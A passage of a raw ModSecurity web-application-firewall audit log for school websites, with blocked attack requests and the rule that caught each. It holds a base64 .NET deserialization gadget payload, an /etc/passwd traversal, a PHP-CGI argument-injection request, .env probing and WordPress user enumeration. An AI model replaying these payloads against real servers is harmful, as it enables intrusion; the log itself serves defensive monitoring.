Wx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=","format":"3"} --9618de2d-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9618de2d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=text/json"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747937961750232 4329 (- - -) Stopwatch2: 1747937961750232 4329; combined=3008, p1=493, p2=2433, p3=25, p4=30, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9618de2d-Z-- --73aa2d60-A-- [23/May/2025:01:21:04 +0700] aC9rEOThJmFSRJ5-OZfqJwAAAFc 103.236.140.4 33088 103.236.140.4 8181 --73aa2d60-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 163523833 --73aa2d60-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --73aa2d60-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747938064182310 1671 (- - -) Stopwatch2: 1747938064182310 1671; combined=697, p1=331, p2=336, p3=0, p4=0, p5=29, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73aa2d60-Z-- --96c1cb56-A-- [23/May/2025:01:31:20 +0700] aC9teCektx75wRFPQygHSwAAAMA 103.236.140.4 33152 103.236.140.4 8181 --96c1cb56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.220.113.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.220.113.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --96c1cb56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96c1cb56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747938680445437 2934 (- - -) Stopwatch2: 1747938680445437 2934; combined=1272, p1=444, p2=798, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96c1cb56-Z-- --c53d0d1b-A-- [23/May/2025:01:42:33 +0700] aC9wGSektx75wRFPQygHVAAAANg 103.236.140.4 33258 103.236.140.4 8181 --c53d0d1b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: AdsBot-Google ( http://www.google.com/adsbot.html) Accept-Charset: utf-8 --c53d0d1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c53d0d1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747939353062271 847 (- - -) Stopwatch2: 1747939353062271 847; combined=338, p1=295, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c53d0d1b-Z-- --abe19e76-A-- [23/May/2025:01:59:33 +0700] aC90FSektx75wRFPQygHXgAAAM4 103.236.140.4 33392 103.236.140.4 8181 --abe19e76-B-- POST /userentry?accountId=/../../../tomcat/webapps/ZpoYt/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 166344505 --abe19e76-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --abe19e76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abe19e76-E-- --abe19e76-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747940373251607 3297 (- - -) Stopwatch2: 1747940373251607 3297; combined=2210, p1=363, p2=1820, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abe19e76-Z-- --894b9d54-A-- [23/May/2025:02:10:04 +0700] aC92jGfriXjg62qQwE9s8AAAAIk 103.236.140.4 33464 103.236.140.4 8181 --894b9d54-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 163523943 --894b9d54-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --894b9d54-E-- --894b9d54-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747941004128692 1800 (- - -) Stopwatch2: 1747941004128692 1800; combined=495, p1=339, p2=126, p3=0, p4=0, p5=29, sr=68, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --894b9d54-Z-- --9751311f-A-- [23/May/2025:02:14:31 +0700] aC93l30O04WKE1HJ5iR7sgAAAAs 103.236.140.4 33488 103.236.140.4 8181 --9751311f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --9751311f-C-- --9751311f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9751311f-E-- --9751311f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747941271392472 4015 (- - -) Stopwatch2: 1747941271392472 4015; combined=2280, p1=488, p2=1759, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9751311f-Z-- --9c548914-A-- [23/May/2025:02:31:35 +0700] aC97lyektx75wRFPQygHbAAAAMg 103.236.140.4 33594 103.236.140.4 8181 --9c548914-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.102.239.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.102.239.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9c548914-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c548914-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747942295167211 2913 (- - -) Stopwatch2: 1747942295167211 2913; combined=1257, p1=436, p2=791, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c548914-Z-- --3ea89e6e-A-- [23/May/2025:02:39:53 +0700] aC99iSektx75wRFPQygHdgAAANM 103.236.140.4 33644 103.236.140.4 8181 --3ea89e6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: 